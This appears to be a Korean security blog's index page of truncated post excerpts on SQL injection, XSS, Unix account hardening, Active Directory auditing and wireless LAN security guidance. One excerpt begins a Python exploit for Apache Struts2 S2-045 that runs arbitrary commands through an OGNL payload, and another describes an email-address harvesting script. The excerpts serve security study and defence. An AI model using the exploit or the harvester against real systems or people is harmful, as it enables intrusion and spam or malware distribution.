SQL Injection 취약점 취약점 상세 내용 및 보안 대책 웹 사이트는 DBMS와 연동하므로 웹 어플리케이션에서 사용자의 입력값을 통하여 데이타 트랜잭션이 발생함. 만일 사용자 입력값에 대한 유효성 검증이 누락될 경우, 악의적인 사용자는 정상적인 입력값 대신 SQL 쿼리문이 포함된 조작된 입력값을 전송하여 서버측 쿼리문의 구조를 변경할 수 있으며, 이를 통해서 사용자 인증을 우회하거나 데이터베이스의 정보를 유출시키고 서버의 […]
1절. 입력 데이터 검증 및 표현 1. 크로스 사이트 스크립트 공격 취약점(XSS) 가. 정의 외부에서 입력되는 검증되지 않은 입력이 동적 웹페이지의 생성에 사용될 경우, 전송된 동적 웹페이지를 열람하는 접속자의 권한으로 부적절한 스크립트가 수행되어 정보 유출 등의 피해를 입힐 수 있다. 나. 안전한 코딩기법 외부에서 입력한 문자열을 사용하여 결과 페이지를 생성할 경우, replaceAll() 등과 같은 메소드를
1. 계정관리 Default 계정 삭제(중요도 : 상) 시스템 Default 계정 및 사용하지 않는 계정의 삭제 기준 가. Default 계정(lp,uucp,nuucp) 삭제나. 퇴직, 전환배치, 휴직, 계약 해지자 계정 삭제 ※ 가, 나 항목 모두 적용 해야 함 설정방법 # userdel lp # userdel uucp # userdel nuucp 상세설명 시스템에서 이용하지 않는 Default 계정 및 의심스러운 특이한 계정의
1. 계정관리 1.1. Default 계정(중요도 : 중) 개요 확인방법 ■ 명령어 # cat /etc/passwd | egrep “lp:|uucp:|nuucp:” | grep -v “lpd” 설정방법 ■ 명령어 # userdel lp # userdel uucp # userdel nuucp 1.2. 일반계정 root권한 관리(중요도 : 상) 개요 확인방법 < 일반계정 및 일반계정의 디렉터리 구분 * “/etc/passwd “파일내용에서 구분 > 아래의 내용은 /etc/passwd
1. 계정관리 Default 계정 삭제(중요도 : 상) 시스템 Default 계정 및 사용하지 않는 계정의 삭제 기준 가. Default 계정(lp,uucp,nuucp) 삭제 나. 퇴직, 전배, 휴직, 계약 해지자 계정 삭제 ※ 가, 나 항목 모두 적용 해야 합니다. 설정 방법 # userdel lp # userdel uucp # userdel nuucp 상세설명 시스템에서 이용하지 않는 Default 계정 및 의심스러운
* 이메일 주소를 왜 수집하지?– 악성코드, 바이러스 등을 이메일로 유포하기 위해서 공격자는 이메일 주소를 얻을 필요가 있어– 제일 간단하게 이메일 주소를 얻을 수 있는 방법은 검색을 이용하는 것이지– 이 스크립트는 검색엔진에서 검색한 결과에서 이메일 주소를 파싱해서 출력해줘– kitploit에 게시된 infoga를 일부 수정하여 만들었어 * 이용하는 검색엔진– google, bing, yahoo, pgp 검색엔진을 이용하여 이메일 주소를 수집해
(*) 출처: https://github.com/rapid7/metasploit-framework/issues/8064 * usage: $python struts2_S2-045.py <URL> <CMD> $python struts2_S2-045.py http://127.0.0.1:8080/2.3.15.1-showcase/showcase.action “ls -al” [ struts2_S2-045.py – Python Code ] #!/usr/bin/python # -*- coding: utf-8 -*- import urllib2 import httplib def exploit(url, cmd): payload = “%{(#_=’multipart/form-data’).” payload += “(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).” payload += “(#_memberAccess?” payload += “(#_memberAccess=#dm):” payload += “((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).” payload += “(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).” payload += “(#ognlUtil.getExcludedPackageNames().clear()).” payload +=
– Active Directory는 조직내의 자원에 대한 접근통제를 위해 기업이나 기관의 규모와 상관없이 많이 사용되고 있습니다.– 그러나 Active Directory의 서비스 특성을 고려한 보안진단을 하는 곳은 아직까지 드문것으로 보입니다.– Active Directory 보안진단의 중요 포인트는 Domain Controller, Group Policy, User Account, Event Log 등이 있습니다.– 최근 글로벌 조직의 Active Directory를 운영하는 고객사에 대한 취약점 진단에는 Ad User 계정을
* 자기 IP를 숨기려는 목적은 여러 가지가 있다.– 구글이 중국에서 철수 했을때도 Public VPN을 이용하여 차단만을 우회하는 중국인들도 많았고– Red Team으로 구성된 Real PT를 수행하기 위해 불가피하게 자신의 IP를 숨겨야 하는 상황도 있고– 보안 취약점 진단을 하면서 Block된 자신을 IP를 우회하기 위해 사용되기도 하며– 간단한 보안 시스템을 개발한 후 서로 다른 Source IP로 테스트하기 위한
금융부문 무선랜 보안 가이드 – 금융보안연구원, 2010.12 금융부문 무선랜 보안 가이드-금융보안연구원, 2010.12 제 1 장 개 요제 1 절 배 경제 2 절 목 적제 3 절 범 위 제2장 무선랜 서비스 현황 제 1 절 무선랜 기술표준 및 현황1. 무선랜 기술표준2. 무선랜 서비스 현황3. 세계 무선랜 보안 관련 주요 국가 제도 제 2 절
